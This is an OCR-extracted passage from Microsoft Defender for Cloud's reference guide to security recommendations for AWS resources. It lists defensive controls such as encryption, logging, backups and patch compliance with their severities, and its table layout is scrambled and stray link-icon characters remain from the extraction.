Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Recommendation Description & related policy Severity 


(Related policy: Ensure that 'PHP version’ is the 
latest, if used as a part of the WEB app) 


Next steps 
To learn more about recommendations, see the following: 


e What are security policies, initiatives, and recommendations? 
e Review your security recommendations 


Security recommendations for AWS 


resources - a reference guide 


Article e 06/27/2023 


This article lists the recommendations you might see in Microsoft Defender for Cloud if 


you've connected an AWS account from the Environment settings page. The 


recommendations shown in your environment depend on the resources you're 


protecting and your customized configuration. 


To learn about how to respond to these recommendations, see Remediate 


recommendations in Defender for Cloud. 


Your secure score is based on the number of security recommendations you've 


completed. To decide which recommendations to resolve first, look at the severity of 


each one and its potential impact on your secure score. 


AWS Compute recommendations 


There are 18 AWS recommendations in this category. 


Recommendation 


Amazon EC2 
instances 
managed by 
Systems Manager 
should have a 
patch compliance 
status of 
COMPLIANT after 
a patch 
installation Z 


Description 


This control checks whether the compliance status of the 
Amazon EC2 Systems Manager patch compliance is COMPLIANT 
or NON_COMPLIANT after the patch installation on the instance. 
It only checks instances that are managed by AWS Systems 
Manager Patch Manager. 

It does not check whether the patch was applied within the 30- 
day limit prescribed by PCI DSS requirement ‘6.2’. 

It also does not validate whether the patches applied were 
classified as security patches. 

You should create patching groups with the appropriate baseline 
settings and ensure in-scope systems are managed by those 
patch groups in Systems Manager. For more information about 
patch groups, see the AWS Systems Manager User Guide®. 


Severity 


Medium 


Recommendation 


Amazon EFS 
should be 
configured to 
encrypt file data at 
rest using AWS 
KMS 


Amazon EFS 
volumes should 
be in backup 
plans 7 


Application Load 
Balancer deletion 
protection should 
be enabled Z 


Auto Scaling 
groups associated 
with a load 
balancer should 
use health 

checks 6 


AWS accounts 
should have Azure 
Arc auto 
provisioning 
enabled Z 


Description 


This control checks whether Amazon Elastic File System is 
configured to encrypt the file data using AWS KMS. The check 
fails in the following cases: 

*"Encrypted" is set to "false" in the DescribeFileSystems Z 
response. 

The "KmsKeyld" key in the DescribeFileSystems E response does 
not match the KmsKeyld parameter for efs-encrypted-check”. 
Note that this control does not use the "KmsKeyld" parameter for 
efs-encrypted-check SZ, It only checks the value of "Encrypted". 
For an added layer of security for your sensitive data in Amazon 
EFS, you should create encrypted file systems. 

Amazon EFS supports encryption for file systems at-rest. You can 
enable encryption of data at rest when you create an Amazon 
EFS file system. 

To learn more about Amazon EFS encryption, see Data 
encryption in Amazon EFS SZ in the Amazon Elastic File System 
User Guide. 


This control checks whether Amazon Elastic File System (Amazon 
EFS) file systems are added to the backup plans in AWS Backup. 
The control fails if Amazon EFS file systems are not included in 
the backup plans. 

Including EFS file systems in the backup plans helps you to 
protect your data from deletion and data loss. 


This control checks whether an Application Load Balancer has 
deletion protection enabled. The control fails if deletion 
protection is not configured. 

Enable deletion protection to protect your Application Load 
Balancer from deletion. 


Auto Scaling groups that are associated with a load balancer are 
using Elastic Load Balancing health checks. 

PCI DSS does not require load balancing or highly available 
configurations. This is recommended by AWS best practices. 


For full visibility of the security content from Microsoft Defender 
for servers, EC2 instances should be connected to Azure Arc. To 
ensure that all eligible EC2 instances automatically receive Azure 
Arc, enable auto-provisioning from Defender for Cloud at the 
AWS account level. Learn more about Azure Arc, and Microsoft 
Defender for Servers. 


Severity 


Medium 


Medium 


Medium 


Low 


High 


Recommendation 


CloudFront 
distributions 
should have origin 
failover 
configured 6 


CodeBuild GitHub 
or Bitbucket 
source repository 
URLs should use 
OAuth # 


CodeBuild project 
environment 
variables should 
not contain 
credentials 7 


DynamoDB 
Accelerator (DAX) 
clusters should be 
encrypted at 

rest @ 


DynamoDB tables 
should 
automatically 
scale capacity with 
demand? 


EC2 instances 
should be 
connected to 
Azure Arc? 


Description 


This control checks whether an Amazon CloudFront distribution 
is configured with an origin group that has two or more origins. 
CloudFront origin failover can increase availability. Origin failover 
automatically redirects traffic to a secondary origin if the primary 
origin is unavailable or if it returns specific HTTP response status 
codes. 


This control checks whether the GitHub or Bitbucket source 
repository URL contains either personal access tokens or a user 
name and password. 

Authentication credentials should never be stored or transmitted 
in clear text or appear in the repository URL. Instead of personal 
access tokens or user name and password, you should use OAuth 
to grant authorization for accessing GitHub or Bitbucket 
repositories. 

Using personal access tokens or a user name and password could 
expose your credentials to unintended data exposure and 
unauthorized access. 


This control checks whether the project contains the environment 
variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS KEY. 
Authentication credentials AWS_ACCESS KE TO and 

AWS _SECRET_ACCESS_KEY should never be stored in clear text, as 
this could lead to unintended data exposure and unauthorized 
access. 


This control checks whether a DAX cluster is encrypted at rest. 
Encrypting data at rest reduces the risk of data stored on disk 
being accessed by a user not authenticated to AWS. The 
encryption adds another set of access controls to limit the ability 
of unauthorized users to access to the data. 

For example, API permissions are required to decrypt the data 
before it can be read. 


This control checks whether an Amazon DynamoDB table can 
scale its read and write capacity as needed. This control passes if 
the table uses either on-demand capacity mode or provisioned 
mode with auto scaling configured. 

Scaling capacity with demand avoids throttling exceptions, which 
helps to maintain availability of your applications. 


Connect your EC2 instances to Azure Arc in order to have full 
visibility to Microsoft Defender for Servers security content. Learn 
more about Azure Arc, and about Microsoft Defender for Servers 
on hybrid-cloud environment. 


Severity 


Medium 


High 


High 


Medium 


Medium 


High 


Recommendation 


EC2 instances 
should be 
managed by AWS 
Systems 
Manager & 


Instances 
managed by 
Systems Manager 
should have an 
association 
compliance status 
of COMPLIANT Z 


Description Severity 


Status of the Amazon EC2 Systems Manager patch compliance is © Medium 
‘COMPLIANT' or 'NON_COMPLIANT' after the patch installation 

on the instance. 

Only instances that are managed by AWS Systems Manager Patch 

Manager are checked. Patches that were applied within the 30- 


day limit prescribed by PCI DSS requirement '6' are not checked. 


This control checks whether the status of the AWS Systems Low 
Manager association compliance is COMPLIANT or 
NON_COMPLIANT after the association is run on an instance. The 
control passes if the association compliance status is 
COMPLIANT. 

A State Manager association is a configuration that is assigned to 
your managed instances. The configuration defines the state that 
you want to maintain on your instances. For example, an 
association can specify that antivirus software must be installed 
and running on your instances, or that certain ports must be 
closed. 

After you create one or more State Manager associations, 
compliance status information is immediately available to you in 
the console or in response to AWS CLI commands or 
corresponding Systems Manager API operations. For 
associations, "Configuration" Compliance shows statuses of 
Compliant or Non-compliant and the severity level assigned to 
the association, such as "Critical" or "Medium". To learn more 
about State Manager association compliance, see About About 
State Manager association compliance SZ in the AWS Systems 
Manager User Guide. 

You must configure your in-scope EC2 instances for Systems 
Manager association. You must also configure the patch baseline 
for the security rating of the vendor of patches, and set the 
autoapproval date to meet PCI DSS '3.2.1' requirement '6.2'. For 
additional guidance on how to Create an association”, see 
Create an association in the AWS Systems Manager User Guide. 
For additional information on working with patching in Systems 
Manager, see AWS Systems Manager Patch Manager” in the 
AWS Systems Manager User Guide. 


Recommendation 


Lambda functions 
should have a 
dead-letter queue 
configured £ 


Lambda functions 
should use 
supported 
runtimes E 


Management 
ports of EC2 
instances should 
be protected with 
just-in-time 
network access 
control 4 


Description 


This control checks whether a Lambda function is configured 
with a dead-letter queue. The control fails if the Lambda function 
is not configured with a dead-letter queue. 

As an alternative to an on-failure destination, you can configure 
your function with a dead-letter queue to save discarded events 
for further processing. 

A dead-letter queue acts the same as an on-failure destination. It 
is used when an event fails all processing attempts or expires 
without being processed. 

A dead-letter queue allows you to look back at errors or failed 
requests to your Lambda function to debug or identify unusual 
behavior. 

From a security perspective, it is important to understand why 
your function failed and to ensure that your function does not 
drop data or compromise data security as a result. 

For example, if your function cannot communicate to an 
underlying resource, that could be a symptom of a denial of 
service (DoS) attack elsewhere in the network. 


This control checks that the Lambda function settings for 
runtimes match the expected values set for the supported 
runtimes for each language. This control checks for the following 
runtimes: 

nodejs14.x, nodejs12.x, nodejs10.x, python3.8, python3.7, 
python3.6, ruby2.7, ruby2.5, java11, java8, java8.al2, go1.x, 
dotnetcore3.1, dotnetcore2.1 

Lambda runtimes % are built around a combination of operating 
system, programming language, and software libraries that are 
subject to maintenance and security updates. When a runtime 
component is no longer supported for security updates, Lambda 
deprecates the runtime. Even though you cannot create functions 
that use the deprecated runtime, the function is still available to 
process invocation events. Make sure that your Lambda functions 
are current and do not use out-of-date runtime environments. 

To learn more about the supported runtimes that this control 
checks for the supported languages, see AWS Lambda 

runtimes E in the AWS Lambda Developer Guide. 


Microsoft Defender for Cloud has identified some overly- 
permissive inbound rules for management ports in your network. 
Enable just-in-time access control to protect your Instances from 
internet-based brute-force attacks. Learn more. 


Severity 


Medium 


Medium 


High 


Recommendation 


Unused EC2 
security groups 
should be 
removed % 


Description 


Security groups should be attached to Amazon EC2 instances or 
to an ENI. 

healthy finding can indicate there are unused Amazon EC2 
security groups. 


AWS Container recommendations 


There are 3 AWS recommendations in this category. 


Recommendation 


EKS clusters 
should grant the 
required AWS 
permissions to 
Microsoft 
Defender for 
Cloud # 


EKS clusters 
should have 
Microsoft 
Defender's 
extension for 
Azure Arc 
installed £ 


Microsoft 
Defender for 
Containers should 
be enabled on 
AWS connectors“ 


Description 


Microsoft Defender for Containers provides protections for your 
EKS clusters. 

To monitor your cluster for security vulnerabilities and threats, 
Defender for Containers needs permissions for your AWS 
account. These permissions will be used to enable Kubernetes 
control plane logging on your cluster and establish a reliable 
pipeline between your cluster and Defender for Cloud's backend 
in the cloud. 

Learn more about Microsoft Defender for Cloud's security 
features for containerized environments. 


Microsoft Defender's cluster extension provides security 
capabilities for your EKS clusters. The extension collects data 
from a cluster and its nodes to identify security vulnerabilities 
and threats. 

The extension works with Azure Arc-enabled Kubernetes. 
Learn more about Microsoft Defender for Cloud's security 
features for containerized environments. 


Microsoft Defender for Containers provides real-time threat 
protection for containerized environments and generates alerts 
about suspicious activities. 

Use this information to harden the security of Kubernetes 
clusters and remediate security issues. 


Important: When you've enabled Microsoft Defender for 
Containers and deployed Azure Arc to your EKS clusters, the 
protections - and charges - will begin. If you don't deploy Azure 
Arc on a cluster, Defender for Containers will not protect it and 
no charges will be incurred for this Microsoft Defender plan for 
that cluster. 


Severity 


Low 


Severity 


High 


High 


High 


Data plane recommendations 


All the data plane recommendations listed here are supported under AWS after enabling 


the Azure policy extension. 


AWS Data recommendations 


There are 66 AWS recommendations in this category. 


Recommendation 


Amazon Aurora 
clusters should 
have backtracking 
enabled zZ 


Amazon EBS 
snapshots 
shouldn't be 
publicly 
restorable Z 


Amazon ECS task 
definitions should 
have secure 
networking modes 
and user 
definitions E 


Description 


This control checks whether Amazon Aurora clusters have 
backtracking enabled. 

Backups help you to recover more quickly from a security 
incident. They also strengthen the resilience of your systems. 
Aurora backtracking reduces the time to recover a database to a 
point in time. It doesn't require a database restore to do so. 

For more information about backtracking in Aurora, see 
Backtracking an Aurora DB cluster’ in the Amazon Aurora User 
Guide. 


Amazon EBS snapshots shouldn't be publicly restorable by 
everyone unless explicitly allowed, to avoid accidental exposure 
of data. Additionally, permission to change Amazon EBS 
configurations should be restricted to authorized AWS accounts 
only. 


This control checks whether an active Amazon ECS task definition 
that has host networking mode also has privileged or user 
container definitions. 

The control fails for task definitions that have host network mode 
and container definitions where privileged=false or is empty and 
user=root or is empty. 

If a task definition has elevated privileges, it is because the 
customer has specifically opted in to that configuration. 

This control checks for unexpected privilege escalation when a 
task definition has host networking enabled but the customer 
hasn't opted in to elevated privileges. 


Severity 


Medium 


High 


High 


Recommendation 


Amazon 
Elasticsearch 
Service domains 
should encrypt 
data sent between 
nodes č 


Amazon 
Elasticsearch 
Service domains 
should have 
encryption at rest 
enabled 7 


Amazon RDS 
database should 
be encrypted 
using customer 
managed key E 


Amazon RDS 
instance should be 
configured with 
automatic backup 
settings Z 


Amazon Redshift 
clusters should 
have audit logging 
enabled Z 


Description 


This control checks whether Amazon ES domains have node-to- 
node encryption enabled. HTTPS (TLS) can be used to help 
prevent potential attackers from eavesdropping on or 
manipulating network traffic using person-in-the-middle or 
similar attacks. Only encrypted connections over HTTPS (TLS) 
should be allowed. Enabling node-to-node encryption for 
Amazon ES domains ensures that intra-cluster communications 
are encrypted in transit. There can be a performance penalty 
associated with this configuration. You should be aware of and 
test the performance trade-off before enabling this option. 


It's important to enable encryptions rest of Amazon ES domains 
to protect sensitive data 


This check identifies RDS databases that are encrypted with 
default KMS keys and not with customer managed keys. As a 
leading practice, use customer managed keys to encrypt the data 
on your RDS databases and maintain control of your keys and 
data on sensitive workloads. 


This check identifies RDS instances, which aren't set with the 
automatic backup setting. If Automatic Backup is set, RDS creates 
a storage volume snapshot of your DB instance, backing up the 
entire DB instance and not just individual databases, which 
provide for point-in-time recovery. The automatic backup will 
happen during the specified backup window time and keeps the 
backups for a limited period of time as defined in the retention 
period. It's recommended to set automatic backups for your 
critical RDS servers that will help in the data restoration process. 


This control checks whether an Amazon Redshift cluster has audit 
logging enabled. 

Amazon Redshift audit logging provides additional information 
about connections and user activities in your cluster. This data 
can be stored and secured in Amazon S3 and can be helpful in 
security audits and investigations. For more information, see 
Database audit logging” in the Amazon Redshift Cluster 
Management Guide. 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Recommendation 


Amazon Redshift 
clusters should 
have automatic 
snapshots 
enabled Z 


Amazon Redshift 
clusters should 
prohibit public 
access E 


Amazon Redshift 
should have 
automatic 
upgrades to major 
versions 

enabled Z 


Amazon SQS 
queues should be 
encrypted at 

rest £ 


An RDS event 
notifications 
subscription 
should be 
configured for 
critical cluster 
events E 


Description 


This control checks whether Amazon Redshift clusters have 
automated snapshots enabled. It also checks whether the 
snapshot retention period is greater than or equal to seven. 
Backups help you to recover more quickly from a security 
incident. They strengthen the resilience of your systems. Amazon 
Redshift takes periodic snapshots by default. This control checks 
whether automatic snapshots are enabled and retained for at 
least seven days. For more details on Amazon Redshift 
automated snapshots, see Automated snapshots % in the 
Amazon Redshift Cluster Management Guide. 


We recommend Amazon Redshift clusters to avoid public 
accessibility by evaluating the ‘publiclyAccessible' field in the 
cluster configuration item. 


This control checks whether automatic major version upgrades 
are enabled for the Amazon Redshift cluster. 

Enabling automatic major version upgrades ensures that the 
latest major version updates to Amazon Redshift clusters are 
installed during the maintenance window. 

These updates might include security patches and bug fixes. 
Keeping up to date with patch installation is an important step in 
securing systems. 


This control checks whether Amazon SQS queues are encrypted 
at rest. 

Server-side encryption (SSE) allows you to transmit sensitive data 
in encrypted queues. To protect the content of messages in 
queues, SSE uses keys managed in AWS KMS. 

For more information, see Encryption at rest E in the Amazon 
Simple Queue Service Developer Guide. 


This control checks whether an Amazon RDS event subscription 
exists that has notifications enabled for the following source 
type, 

event category key-value pairs. DBCluster: ["Mmaintenance" and 
"failure"]. 

RDS event notifications use Amazon SNS to make you aware of 
changes in the availability or configuration of your RDS 
resources. These notifications allow for rapid response. 

For more information about RDS event notifications, see Using 
Amazon RDS event notification in the Amazon RDS User 
Guide. 7 


Severity 


Medium 


High 


Medium 


Medium 


Low 


Recommendation 


An RDS event 
notifications 
subscription 
should be 
configured for 
critical database 
instance events E 


An RDS event 
notifications 
subscription 
should be 
configured for 
critical database 
parameter group 
events E 


An RDS event 
notifications 
subscription 
should be 
configured for 
critical database 
security group 
events E 


API Gateway REST 
and WebSocket 
API logging 
should be 
enabled Z 


Description 


This control checks whether an Amazon RDS event subscription 
exists with notifications enabled for the following source type. 
event category key-value pairs. DBInstance: ["maintenance", 
“configuration change" and "failure"]. 

RDS event notifications use Amazon SNS to make you aware of 
changes in the availability or configuration of your RDS 
resources. These notifications allow for rapid response. 

For more information about RDS event notifications, see Using 
Amazon RDS event notification Z in the Amazon RDS User 
Guide. 


This control checks whether an Amazon RDS event subscription 
exists with notifications enabled for the following source type. 
event category key-value pairs. DBParameterGroup: 
["configuration","change’]. 

RDS event notifications use Amazon SNS to make you aware of 
changes in the availability or configuration of your RDS 
resources. These notifications allow for rapid response. 

For more information about RDS event notifications, see Using 
Amazon RDS event notification E in the Amazon RDS User 


Guide. 


This control checks whether an Amazon RDS event subscription 
exists with notifications enabled for the following source type, 
event category key-value pairs. DBSecurityGroup: 
["configuration","change", failure"). 

RDS event notifications use Amazon SNS to make you aware of 
changes in the availability or configuration of your RDS 
resources. These notifications allow for a rapid response. 

For more information about RDS event notifications , see Using 
Amazon RDS event notification Z in the Amazon RDS User 


Guide. 


This control checks whether all stages of an Amazon API Gateway 
REST or WebSocket API have logging enabled. 

The control fails if logging isn't enabled for all methods of a 
stage or if logging Level is neither ERROR nor INFO. 

API Gateway REST or WebSocket API stages should have relevant 
logs enabled. API Gateway REST and WebSocket API execution 
logging provides detailed records of requests made to API 
Gateway REST and WebSocket API stages. 

The stages include API integration backend responses, Lambda 
authorizer responses, and the requestld for AWS integration 
endpoints. 


Severity 


Low 


Low 


Low 


Medium 


Recommendation 


API Gateway REST 
API cache data 
should be 
encrypted at 

rest @ 


API Gateway REST 
API stages should 
be configured to 
use SSL 
certificates for 
backend 
authentication & 


API Gateway REST 
API stages should 
have AWS X-Ray 

tracing enabled tz 


API Gateway 
should be 
associated with an 
AWS WAF web 
ACL’ 


Description 


This control checks whether all methods in API Gateway REST API 
stages that have cache enabled are encrypted. The control fails if 
any method in an API Gateway REST API stage is configured to 
cache and the cache isn't encrypted. 

Encrypting data at rest reduces the risk of data stored on disk 
being accessed by a user not authenticated to AWS. It adds 
another set of access controls to limit unauthorized users ability 
access the data. For example, API permissions are required to 
decrypt the data before it can be read. 

API Gateway REST API caches should be encrypted at rest for an 
added layer of security. 


This control checks whether Amazon API Gateway REST API 
stages have SSL certificates configured. 

Backend systems use these certificates to authenticate that 
incoming requests are from API Gateway. 

API Gateway REST API stages should be configured with SSL 
certificates to allow backend systems to authenticate that 
requests originate from API Gateway. 


This control checks whether AWS X-Ray active tracing is enabled 
for your Amazon API Gateway REST API stages. 

X-Ray active tracing enables a more rapid response to 
performance changes in the underlying infrastructure. Changes in 
performance could result in a lack of availability of the API. 

X-Ray active tracing provides real-time metrics of user requests 
that flow through your API Gateway REST API operations and 
connected services. 


This control checks whether an API Gateway stage uses an AWS 
WAF web access control list (ACL). 

This control fails if an AWS WAF web ACL isn't attached to a REST 
API Gateway stage. 

AWS WAF is a web application firewall that helps protect web 
applications and APIs from attacks. It enables you to configure an 
ACL, which is a set of rules that allow, block, or count web 
requests based on customizable web security rules and 
conditions that you define. 

Ensure that your API Gateway stage is associated with an AWS 
WAF web ACL to help protect it from malicious attacks. 


Severity 


Medium 


Medium 


Low 


Medium 


Recommendation 


Application and 
Classic Load 
Balancers logging 
should be 
enabled Z 


Attached EBS 
volumes should 
be encrypted at- 
rest £ 


AWS Database 
Migration Service 
replication 
instances 
shouldn't be 
public % 


Description Severity 


This control checks whether the Application Load Balancer and Medium 
the Classic Load Balancer have logging enabled. The control fails 
if access_logs.s3.enabled is false. 

Elastic Load Balancing provides access logs that capture detailed 
information about requests sent to your load balancer. Each log 
contains information such as the time the request was received, 
the client's IP address, latencies, request paths, and server 
responses. You can use these access logs to analyze traffic 
patterns and to troubleshoot issues. 

To learn more, see Access logs for your Classic Load Balancer Z 
in User Guide for Classic Load Balancers. 


This control checks whether the EBS volumes that are in an Medium 
attached state are encrypted. To pass this check, EBS volumes 
must be in use and encrypted. If the EBS volume isn't attached, 
then it isn't subject to this check. 

For an added layer of security of your sensitive data in EBS 
volumes, you should enable EBS encryption at rest. Amazon EBS 
encryption offers a straightforward encryption solution for your 
EBS resources that doesn't require you to build, maintain, and 
secure your own key management infrastructure. It uses AWS 
KMS customer master keys (CMK) when creating encrypted 
volumes and snapshots. 

To learn more about Amazon EBS encryption, see Amazon EBS 
encryption Z in the Amazon EC2 User Guide for Linux Instances. 


To protect your replicated instances from threats. A private High 
replication instance should have a private IP address that you 

can't access outside of the replication network. 

A replication instance should have a private IP address when the 

source and target databases are in the same network, and the 

network is connected to the replication instance's VPC using a 

VPN, AWS Direct Connect, or VPC peering. 

You should also ensure that access to your AWS DMS instance 
configuration is limited to only authorized users. 

To do this, restrict users' IAM permissions to modify AWS DMS 


settings and resources. 


Recommendation 


Classic Load 
Balancer listeners 
should be 
configured with 
HTTPS or TLS 
termination E 


Classic Load 
Balancers should 
have connection 
draining 
enabled £ 


CloudFront 
distributions 
should have AWS 
WAF enabled Z 


Description Severity 


This control checks whether your Classic Load Balancer listeners Medium 
are configured with HTTPS or TLS protocol for front-end (client 
to load balancer) connections. The control is applicable if a 
Classic Load Balancer has listeners. If your Classic Load Balancer 
doesn't have a listener configured, then the control doesn't 
report any findings. 

The control passes if the Classic Load Balancer listeners are 
configured with TLS or HTTPS for front-end connections. 

The control fails if the listener isn't configured with TLS or HTTPS 
for front-end connections. 

Before you start to use a load balancer, you must add one or 
more listeners. A listener is a process that uses the configured 
protocol and port to check for connection requests. Listeners can 
support both HTTP and HTTPS/TLS protocols. You should always 
use an HTTPS or TLS listener, so that the load balancer does the 
work of encryption and decryption in transit. 


This control checks whether Classic Load Balancers have Medium 
connection draining enabled. 

Enabling connection draining on Classic Load Balancers ensures 

that the load balancer stops sending requests to instances that 

are de-registering or unhealthy. It keeps the existing connections 

open. This is useful for instances in Auto Scaling groups, to 


ensure that connections aren't severed abruptly. 


This control checks whether CloudFront distributions are Medium 
associated with either AWS WAF or AWS WAFv2 web ACLs. The 

control fails if the distribution isn't associated with a web ACL. 

AWS WAF is a web application firewall that helps protect web 

applications and APIs from attacks. It allows you to configure a 

set of rules, called a web access control list (web ACL), that allow, 

block, or count web requests based on customizable web 

security rules and conditions that you define. Ensure your 

CloudFront distribution is associated with an AWS WAF web ACL 


to help protect it from malicious attacks. 


Recommendation 


CloudFront 
distributions 
should have 
logging enabled Z 


CloudFront 
distributions 
should require 
encryption in 
transit Z 


CloudtTrail logs 
should be 
encrypted at rest 
using KMS 
CMKs Z 


Connections to 
Amazon Redshift 
clusters should be 
encrypted in 
transit Z 


Description Severity 


This control checks whether server access logging is enabled on Medium 
CloudFront distributions. The control fails if access logging isn't 
enabled for a distribution. 

CloudFront access logs provide detailed information about every 
user request that CloudFront receives. Each log contains 
information such as the date and time the request was received, 
the IP address of the viewer that made the request, the source of 
the request, and the port number of the request from the viewer. 
These logs are useful for applications such as security and access 
audits and forensics investigation. For more guidance on how to 
analyze access logs, see Querying Amazon CloudFront logs in the 
Amazon Athena User Guide. 


This control checks whether an Amazon CloudFront distribution Medium 
requires viewers to use HTTPS directly or whether it uses 

redirection. The control fails if ViewerProtocolPolicy is set to 

allow-all for defaultCacheBehavior or for cacheBehaviors. 

HTTPS (TLS) can be used to help prevent potential attackers from 

using person-in-the-middle or similar attacks to eavesdrop on or 
manipulate network traffic. Only encrypted connections over 

HTTPS (TLS) should be allowed. Encrypting data in transit can 

affect performance. You should test your application with this 

feature to understand the performance profile and the impact of 


TLS. 


We recommended to configure CloudTrail use SSE-KMS. Medium 
Configuring CloudTrail to use SSE-KMS provides more 

confidentiality controls on log data as a given user must have S3 

read permission on the corresponding log bucket and must be 


granted decrypt permission by the CMK policy. 


This control checks whether connections to Amazon Redshift Medium 
clusters are required to use encryption in transit. The check fails if 

the Amazon Redshift cluster parameter require_SSL isn't set to '1'. 

TLS can be used to help prevent potential attackers from using 
person-in-the-middle or similar attacks to eavesdrop on or 

manipulate network traffic. Only encrypted connections over TLS 

should be allowed. Encrypting data in transit can affect 

performance. You should test your application with this feature 


to understand the performance profile and the impact of TLS. 


Recommendation 


Connections to 
Elasticsearch 
domains should 
be encrypted 
using TLS 1.2% 


DynamoDB tables 
should have 
point-in-time 
recovery 

enabled Z 


EBS default 
encryption should 
be enabled Z 


Elastic Beanstalk 
environments 
should have 
enhanced health 
reporting 
enabled Z 


Description 


This control checks whether connections to Elasticsearch 
domains are required to use TLS 1.2. The check fails if the 
Elasticsearch domain TLSSecurityPolicy isn't Policy-Min-TLS-1-2- 
2019-07. 

HTTPS (TLS) can be used to help prevent potential attackers from 
using person-in-the-middle or similar attacks to eavesdrop on or 
manipulate network traffic. Only encrypted connections over 
HTTPS (TLS) should be allowed. Encrypting data in transit can 
affect performance. You should test your application with this 
feature to understand the performance profile and the impact of 
TLS. TLS 1.2 provides several security enhancements over 
previous versions of TLS. 


This control checks whether point-in-time recovery (PITR) is 
enabled for an Amazon DynamoDB table. 

Backups help you to recover more quickly from a security 
incident. They also strengthen the resilience of your systems. 
DynamoDB point-in-time recovery automates backups for 
DynamoDB tables. It reduces the time to recover from accidental 
delete or write operations. 

DynamoDB tables that have PITR enabled can be restored to any 
point in time in the last 35 days. 


This control checks whether account-level encryption is enabled 
by default for Amazon Elastic Block Store(Amazon EBS). 

The control fails if the account level encryption isn't enabled. 
When encryption is enabled for your account, Amazon EBS 
volumes and snapshot copies are encrypted at rest. This adds an 
more layer of protection for your data. 

For more information, see Encryption by default Dn the Amazon 
EC2 User Guide for Linux Instances. 

Note that following instance types don't support encryption: R1, 
C1, and M1. 


This control checks whether enhanced health reporting is 
enabled for your AWS Elastic Beanstalk environments. 

Elastic Beanstalk enhanced health reporting enables a more rapid 
response to changes in the health of the underlying 
infrastructure. These changes could result in a lack of availability 
of the application. 

Elastic Beanstalk enhanced health reporting provides a status 
descriptor to gauge the severity of the identified issues and 
identify possible causes to investigate. The Elastic Beanstalk 
health agent, included in supported Amazon Machine Images 
(AMIs), evaluates logs and metrics of environment EC2 instances. 


Severity 


Medium 


Medium 


Medium 


Low 


Recommendation 


Elastic Beanstalk 
managed platform 
updates should be 
enabled Z 


Elastic Load 
Balancer shouldn't 
have ACM 
certificate expired 
or expiring in 90 
days. E 


Elasticsearch 
domain error 
logging to 
CloudWatch Logs 
should be 
enabled £Z 


Elasticsearch 
domains should 
be configured 
with at least three 
dedicated master 
nodes 7 


Elasticsearch 
domains should 
have at least three 
data nodes Z 


Description 


This control checks whether managed platform updates are 
enabled for the Elastic Beanstalk environment. 

Enabling managed platform updates ensures that the latest 
available platform fixes, updates, and features for the 
environment are installed. Keeping up to date with patch 
installation is an important step in securing systems. 


This check identifies Elastic Load Balancers (ELB) which are using 
ACM certificates expired or expiring in 90 days. AWS Certificate 
Manager (ACM) is the preferred tool to provision, manage, and 
deploy your server certificates. With ACM you can request a 
certificate or deploy an existing ACM or external certificate to 
AWS resources. As a best practice, it's recommended to reimport 
expiring/expired certificates while preserving the ELB associations 
of the original certificate. 


This control checks whether Elasticsearch domains are configured 
to send error logs to CloudWatch Logs. 

You should enable error logs for Elasticsearch domains and send 
those logs to CloudWatch Logs for retention and response. 
Domain error logs can assist with security and access audits, and 
can help to diagnose availability issues. 


This control checks whether Elasticsearch domains are configured 
with at least three dedicated master nodes. This control fails if 
the domain doesn't use dedicated master nodes. This control 
passes if Elasticsearch domains have five dedicated master 
nodes. However, using more than three master nodes might be 
unnecessary to mitigate the availability risk, and will result in 
more cost. 

An Elasticsearch domain requires at least three dedicated master 
nodes for high availability and fault-tolerance. Dedicated master 
node resources can be strained during data node blue/green 
deployments because there are more nodes to manage. 
Deploying an Elasticsearch domain with at least three dedicated 
master nodes ensures sufficient master node resource capacity 
and cluster operations if a node fails. 


This control checks whether Elasticsearch domains are configured 
with at least three data nodes and zoneAwarenessEnabled is true. 
An Elasticsearch domain requires at least three data nodes for 
high availability and fault-tolerance. Deploying an Elasticsearch 
domain with at least three data nodes ensures cluster operations 
if a node fails. 


Severity 


High 


High 


Medium 


Medium 


Medium 


Recommendation 


Elasticsearch 
domains should 
have audit logging 
enabled Z 


Enhanced 
monitoring should 
be configured for 
RDS DB instances 
and clusters 7 


Ensure rotation for 
customer created 
CMKs is 

enabled Z 


Description 


This control checks whether Elasticsearch domains have audit 
logging enabled. This control fails if an Elasticsearch domain 
doesn't have audit logging enabled. 

Audit logs are highly customizable. They allow you to track user 
activity on your Elasticsearch clusters, including authentication 
successes and failures, requests to OpenSearch, index changes, 
and incoming search queries. 


This control checks whether enhanced monitoring is enabled for 
your RDS DB instances. 

In Amazon RDS, Enhanced Monitoring enables a more rapid 
response to performance changes in underlying infrastructure. 
These performance changes could result in a lack of availability 
of the data. Enhanced Monitoring provides real-time metrics of 
the operating system that your RDS DB instance runs on. An 
agent is installed on the instance. The agent can obtain metrics 
more accurately than is possible from the hypervisor layer. 
Enhanced Monitoring metrics are useful when you want to see 
how different processes or threads on a DB instance use the CPU. 
For more information, see Enhanced Monitoring £ in 

the Amazon RDS User Guide. 


AWS Key Management Service (KMS) allows customers to rotate 
the backing key which is key material stored within the KMS 
which is tied to the key ID of the Customer Created customer 
master key (CMK). 

It's the backing key that is used to perform cryptographic 
operations such as encryption and decryption. 

Automated key rotation currently retains all prior backing keys so 
that decryption of encrypted data can take place transparently. 
It's recommended that CMK key rotation be enabled. 

Rotating encryption keys helps reduce the potential impact of a 
compromised key as data encrypted with a new key can't be 
accessed with a previous key that may have been exposed. 


Severity 


Medium 


Low 


Medium 


Recommendation 


Ensure S3 bucket 
access logging is 
enabled on the 
CloudtTrail S3 
bucket z 


Ensure the S3 
bucket used to 
store CloudTrail 
logs isn't publicly 
accessible Z 


IAM shouldn't 
have expired 
SSL/TLS 
certificates 7 


Imported ACM 
certificates should 
be renewed after a 
specified time 
period č 


Description 


S3 Bucket Access Logging generates a log that contains access Low 
records Ensure S3 bucket access logging is enabled on the 
CloudTrail S3 bucket for each request made to your S3 bucket. 
An access log record contains details about the request, such as 
the request type, the resources specified in the request worked, 
and the time and date the request was processed. 

It's recommended that bucket access logging be enabled on the 
CloudTrail S3 bucket. 

By enabling S3 bucket logging on target S3 buckets, it's possible 
to capture all events, which may affect objects within an target 
buckets. Configuring logs to be placed in a separate bucket 
allows access to log information, which can be useful in security 
and incident response workflows. 

CloudTrail logs a record of every API call made in your AWS High 
account. These log files are stored in an S3 bucket. 

It's recommended that the bucket policy, or access control list 

(ACL), applied to the S3 bucket that CloudTrail logs to prevents 

public access to the CloudTrail logs. 

Allowing public access to CloudTrail log content may aid an 

adversary in identifying weaknesses in the affected account's use 

or configuration. 


This check identifies expired SSL/TLS certificates. To enable 
